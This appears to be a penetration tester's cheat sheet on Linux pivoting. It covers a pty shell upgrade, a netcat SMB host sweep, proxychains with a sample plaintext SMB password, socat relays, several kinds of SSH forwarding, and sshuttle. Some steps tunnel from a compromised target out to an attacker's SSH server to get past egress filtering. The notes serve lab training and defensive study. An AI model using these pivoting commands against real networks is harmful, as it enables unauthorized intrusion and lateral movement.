1. Linux Port Forwarding

Tunneling Theory + SOCKS:

Port forwarding may need tty capabilities on target machine, so import with python:

python3 -c 'import pty; pty.spawn("/bin/bash")'

Enumerate hosts to tunnel to without nmap:

for i in $(seq 1 254); do nc -zv -w 1 172.16.50.$i 445; done

Confirm the tunnel is working from another shell by listing listening ports:

ss -ntplu

Force packets over SOCKS with Proxychains:

#Edit /etc/proxychains4.conf to add the socket to the end:
socks5 <ip> <port>

#Prepend "proxychains -q -f <conf-file>" to the command to run, such as:
proxychains -q -f /etc/proxychains4.conf smbclient -L //172.16.50.217/ -U hr_admin --password=Welcome1234

• -q silences any proxychains output
• Might use socks4 depending on versioning
• Won't work on statically-linked binaries
• Edit tcp_read_time_out and tcp_connect_time_out values in the conf-file for faster connections.

Socat port forwarding:

socat -ddd TCP-LISTEN:<listeningport>,fork TCP:<forkip>:<forkport>

SSH Local Port Forwarding:

ssh -v -N -L 0.0.0.0:2345:<forkip>:<forkport> <sshuser>@<passthroughip>

SSH Dynamic Port Forwarding:

• Allows for multiple end-sockets at wherever packets can be received
• Uses SOCKS as proxying protocol
• Only limit is that packets have to be properly formatted by SOCK-compatible client software

ssh -N -D 0.0.0.0:2345 <sshuser>@<passthroughip>

SSH Remote Port Forwarding

• Outgoing connections are often much less filtered
• If we can't control and bind to any ports on the target machine, instead we can SSH out and bind to a attacker SSH server

1. Open SSH server on attacker machine:

sudo systemctl start ssh

2. Check server is listening:

sudo ss -ntplu

3. Set up SSH tunnel back to server on target:

ssh -N -R 127.0.0.1:2345:10.4.203.215:5432 crabfeather@192.168.45.180

4. Force packets over SOCKS with Proxychains:

#Edit /etc/proxychains4.conf to add the socket to the end:
socks5 <ip> <port>

#Prepend "proxychains -q -f <conf-file>" to the command to run, such as:
proxychains -q -f /etc/proxychains4.conf smbclient -L //172.16.50.217/ -U hr_admin --password=Welcome1234

5. Win!

SSH Remote Dynamic Port Forwarding:

• Working as Remote PF with functionality of dynamic tunneling
• Available since OpenSSH 7.6 in Oct 2017 -- required client's version
• Works with -R flag but with only one socket, and only needing port which defaults to loopback address

1. Open SSH server on attacker machine:

sudo systemctl start ssh

2. Set up SSH tunnel back to server on target:

ssh -N -R 2345 crabfeather@192.168.45.180

3. Win!

SSHuttle:

• Turns a SSH connection into something similar to a VPN
• Requires root privs on SSH client and Python3 on SSH server
• Routes all types of traffic, including UDP and ICMP using iptables
• Also less packet loss (apparently)

sshuttle -r database_admin@192.168.50.63:2222 10.4.50.0/24 172.16.50.0/24